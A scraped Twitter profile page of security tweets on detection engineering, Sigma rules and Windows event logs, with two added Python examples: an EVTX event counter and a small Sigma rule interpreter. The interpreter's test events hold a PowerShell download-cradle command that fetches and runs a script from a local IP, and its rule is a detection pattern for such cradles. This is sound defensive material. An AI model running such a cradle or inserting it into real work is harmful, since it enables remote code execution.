Nate Guagenti (@neu5ron)'s Twitter Profile
Nate Guagenti

@neu5ron

ID: 324391039

Link: https://github.com/neu5ron
Joined: 26-06-2011 14:45:47

3.3K Tweets

2.2K Followers

1.1K Following

Sebastian Fernandez (@snfernandez):

While this has been used forever to create exploits, it's a very creative way of making a JIT for architectures that don't allow allocating executable memory. The code can be seen in this commit: github.com/ktemkin/qemu/c… (7/7)

Johan Berggren (@jberggren):

Sigma integration in Timesketch. Today we merged a feature to show Sigma rules in the UI. You also have the ability to search your timelines based on the generated query. #DFIR

Nate Guagenti (@neu5ron):

Research from 2007 that mentions RPC calls used within PetitPotam as potential attack surface: "Vista Network Attack Surface Analysis". If there is one, there are more.. vx-underground.org/archive/Symant…

HAMZA 🇲🇦 🇵🇸 (@cyb3rsn0rlax):

Pull request created.
Here is the Jupyter notebook under the forked repo: github.com/H1L021/EVTX-AT…
Examples:
- Top tactics by number of events
- Top 10 Tactics by EventIDs and Event Log Providers
- Top 30 RelativeTargetName of EventID 5145 by ShareName
- Sankey Diagrams

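
The first three views in that list are plain group-and-count operations once each EVTX record has been flattened to one dict per event. The block below is an added example for this page, not code from the notebook or from the EVTX-ATTACK-SAMPLES repository: the records are constructed (field names follow Windows Security event 5145 and a couple of other events), and the Tactic label is assumed to come from the directory a sample was stored under, since that repository groups files by ATT&CK tactic; it is not a field inside the event itself.

```python
from collections import Counter, defaultdict
from typing import Any, Dict, Iterable, List, Tuple

# Constructed, flattened records of the kind an EVTX-to-JSON converter emits.
# Illustrative only, not real logs. "Tactic" is assumed to be derived from the
# sample's directory name, not from the Windows event.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"Tactic": "Lateral Movement", "EventID": 5145, "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc", "IpAddress": "10.0.0.5"},
    {"Tactic": "Lateral Movement", "EventID": 5145, "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc", "IpAddress": "10.0.0.5"},
    {"Tactic": "Discovery", "EventID": 5145, "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "samr", "IpAddress": "10.0.0.7"},
    {"Tactic": "Lateral Movement", "EventID": 5145, "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing",
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "PSEXESVC.exe", "IpAddress": "10.0.0.5"},
    {"Tactic": "Lateral Movement", "EventID": 5145, "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing",
     "ShareName": "\\\\*\\C$", "RelativeTargetName": "Windows\\Temp\\payload.exe", "IpAddress": "10.0.0.5"},
    # Non-5145 events: ignored by the share view, counted by the tactic views.
    {"Tactic": "Lateral Movement", "EventID": 4624, "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing", "LogonType": 3},
    {"Tactic": "Lateral Movement", "EventID": 7045, "Channel": "System",
     "Provider": "Service Control Manager", "ServiceName": "PSEXESVC"},
]


def top_tactics(events: Iterable[Dict[str, Any]], n: int = 10) -> List[Tuple[str, int]]:
    """Tactics ranked by number of events (the notebook's first view)."""
    return Counter(ev["Tactic"] for ev in events).most_common(n)


def top_tactics_by_eventid_provider(events: Iterable[Dict[str, Any]], n: int = 10):
    """(Tactic, EventID, Provider) triples ranked by count: which log sources
    actually carry the evidence for each tactic in the sample set."""
    return Counter((ev["Tactic"], ev["EventID"], ev["Provider"]) for ev in events).most_common(n)


def top_relative_targets(events: Iterable[Dict[str, Any]], event_id: int = 5145,
                         n: int = 30) -> Dict[str, List[Tuple[str, int]]]:
    """For each ShareName, the n most frequent RelativeTargetName values among
    events of the given ID. Records without the share fields are skipped rather
    than aborting the run (5145 always carries them; other IDs do not)."""
    per_share: Dict[str, Counter] = defaultdict(Counter)
    for ev in events:
        if ev.get("EventID") != event_id:
            continue
        share, target = ev.get("ShareName"), ev.get("RelativeTargetName")
        if share is None or target is None:
            continue
        per_share[share][target] += 1
    return {share: ctr.most_common(n) for share, ctr in per_share.items()}


if __name__ == "__main__":
    for tactic, count in top_tactics(SAMPLE_EVENTS):
        print(f"{count:4d}  {tactic}")
    for share, targets in top_relative_targets(SAMPLE_EVENTS).items():
        print(share)
        for target, count in targets:
            print(f"    {count:4d}  {target}")
```

On real data, flatten the .evtx files first (python-evtx or the Rust evtx tool's JSON output both work) and attach the Tactic from each file's path; the Counter grouping stands in for a DataFrame groupby. The 5145 view is the interesting one for lateral movement: named-pipe access under IPC$ (srvsvc, samr, lsarpc) and executables dropped to ADMIN$ or C$ cluster there.
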
Roberto Rodriguez 🇵🇪 (@cyb3rward0g):

🚨 A few detection opportunities while interacting with local AD hybrid health agent registry keys & Azure AD connect health AD FS services ☁️ 📡SACLs & 🛰️Activity Logs (Directory Activity) FTW 🛡️ #AzureSentinel : github.com/search?q=repo%… 🌎 sigma : github.com/SigmaHQ/sigma/…

Roberto Rodriguez 🇵🇪 (@cyb3rward0g):

🚨 Sharing how to deploy a lab environment w/ #AzureSentinel , a few Linux 🐧 VMs and Microsoft Audit Collection Tool (AUOMS) set up 📡to identify & map sources of data to the execution context of OMI! #MSTIC #OMIGOD 😎 This has been very helpful 💥 techcommunity.microsoft.com/t5/azure-senti…

Nasreddine Bencherchali (@nas_bench):

In the last couple of weeks, we've been working 3CORESec 🛡 on a little project we're calling MAL-CL. It aims to collect and document real-world/common "malicious" CLI execs of different tools/utilities. Feedback and contributions are much appreciated. github.com/3CORESec/MAL-CL

Vadim Khrykov (@blackmatter23):

Considering the current situation, when my country is running down, I no longer see a future in Russia for me and my family. I am open to any job offers relevant to my LinkedIn profile. Please DM me for a detailed CV. #NoToWar #НетВойне

Florian Roth ⚡️ (@cyb3rops):

tob mic from my team created a sigma extension for VS Code

It's in an early stage but already pretty useful, and we've already discussed the cool functions and snippets that he's going to add

#Sigma #VSCode

marketplace.visualstudio.com/items?itemName…

Will LaForest 🇺🇦 (@wlaforest):

Check out the #opensource #Kafka #sigma interpreter @mpeacock1964 and I built: github.com/confluentinc/c… Load sigma rules in a topic and the kstreams app will apply them against your streams of observability data in real time! #cybersecurity #cyber inspired by Nate Guagenti socprime
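
The core of a streaming Sigma interpreter is small: match each selection map against the event, then evaluate the rule's condition expression over those selection results, once per record as it comes off the topic. The block below is an added Python sketch of that core for this page; it is not code from the confluentinc project (a Java Kafka Streams application), and it reads the rule from a dict written the way yaml.safe_load() would return it rather than from a topic. The rule, its filter and the process-creation events are all constructed for the example.

```python
import re
from typing import Any, Dict, List, Tuple

# Constructed rule, written as the dict yaml.safe_load() returns for the equivalent
# YAML file. Example for this page, not a SigmaHQ rule; the "filter" exclusion
# (a hypothetical software-deployment parent process) is made up.
SIGMA_RULE: Dict[str, Any] = {
    "title": "PowerShell Download Cradle (constructed example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "iwr "],
        },
        "filter": {"ParentImage|endswith": "\\ccmexec.exe"},
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed process-creation events (Sysmon-style field names) standing in for
# the records a consumer would read off a topic.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.9/a.ps1')",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},                          # should hit
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users",
     "ParentImage": "C:\\Windows\\explorer.exe"},                               # benign
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest -Uri http://10.0.0.9/x -OutFile x",
     "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe"},                            # excluded by filter
]


def _match_value(actual: Any, pattern: Any, modifier: str) -> bool:
    a, p = str(actual).lower(), str(pattern).lower()   # Sigma matching is case-insensitive by default
    ops = {"": a == p, "contains": p in a, "startswith": a.startswith(p), "endswith": a.endswith(p)}
    if modifier not in ops:
        raise ValueError(f"unsupported modifier: {modifier!r}")
    return ops[modifier]


def match_selection(selection: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """A selection map is an AND over its fields; a list value is an OR over alternatives."""
    for key, pattern in selection.items():
        field, _, modifier = key.partition("|")
        alternatives = pattern if isinstance(pattern, list) else [pattern]
        if field not in event or not any(_match_value(event[field], p, modifier) for p in alternatives):
            return False
    return True


def eval_condition(condition: str, detection: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """Recursive-descent evaluation of and/or/not/parentheses over selection names.
    Sigma's '1 of sel*', 'all of them' and aggregation syntax are not handled here."""
    tokens = re.findall(r"\(|\)|[^\s()]+", condition)
    pos = 0

    def take() -> str:
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("unexpected end of condition")
        pos += 1
        return tokens[pos - 1]

    def factor() -> bool:  # factor := 'not' factor | '(' expr ')' | selection-name
        tok = take()
        if tok == "not":
            return not factor()
        if tok == "(":
            inner = expr()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return inner
        if tok in ("and", "or", ")", "condition") or tok not in detection:
            raise ValueError(f"unknown selection or misplaced token: {tok!r}")
        return match_selection(detection[tok], event)

    def term() -> bool:  # term := factor ('and' factor)*
        result = factor()
        while pos < len(tokens) and tokens[pos] == "and":
            take()
            result = factor() and result   # no short-circuit, so every token is consumed
        return result

    def expr() -> bool:  # expr := term ('or' term)*
        result = term()
        while pos < len(tokens) and tokens[pos] == "or":
            take()
            result = term() or result
        return result

    result = expr()
    if pos != len(tokens):
        raise ValueError(f"trailing tokens in condition: {tokens[pos:]}")
    return result


def apply_rules(rules: List[Dict[str, Any]], events: List[Dict[str, Any]]) -> List[Tuple[str, int]]:
    """One pass over the stream; returns (rule title, event index) for every hit."""
    hits = []
    for index, event in enumerate(events):
        for rule in rules:
            det = rule["detection"]
            if eval_condition(det["condition"], det, event):
                hits.append((rule["title"], index))
    return hits
```

Two details matter when doing this on a live stream: field names must already be normalised to what the rule expects (in Sigma terms, the field mapping for the log source), and the condition evaluator must consume every token even when an early term already decides the result, otherwise a malformed rule passes silently and only fails on the event that reaches the broken part.
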

Yarden Shafir (@yarden_shafir):

Quick blog post on a new ETW event to monitor "valid" KASLR bypasses through system calls: windows-internals.com/an-end-to-kasl…